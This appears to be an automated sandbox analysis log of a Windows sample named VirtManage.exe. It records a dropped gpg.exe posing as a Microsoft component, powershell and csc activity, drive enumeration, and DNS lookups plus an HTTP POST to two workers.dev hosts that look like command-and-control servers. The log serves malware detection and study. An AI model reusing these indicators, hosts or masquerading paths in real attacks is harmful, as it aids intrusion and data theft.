Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdbhP source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdbhP source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdb source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdb source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,1_2_004CC650
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,3_2_004CC650
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 4x nop then push esi1_2_0049C5F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 4x nop then push esi3_2_0049C5F0
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004016A0 npth_unprotect,__assuan_recvmsg,npth_protect,1_2_004016A0
Source: global trafficDNS traffic detected: DNS query: nginx-server.paxivo2460.workers.dev
Source: global trafficDNS traffic detected: DNS query: ec2-server.bayaj19162.workers.dev
Source: unknownHTTP traffic detected: POST //r1ktGyxItd20gg/ HTTP/1.1User-Agent: Microsoft Windows NT 10.0.19045.0Content-Type: application/jsonHost: nginx-server.paxivo2460.workers.devContent-Length: 131Expect: 100-continueConnection: Keep-Alive
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.debug.jsT
Source: csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.debug.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.debug.jsT
Source: csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.jsT
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000017.00000002.3434485364.000001E964A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft7
Source: svchost.exe, 0000001D.00000002.2858871850.0000018B7F600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
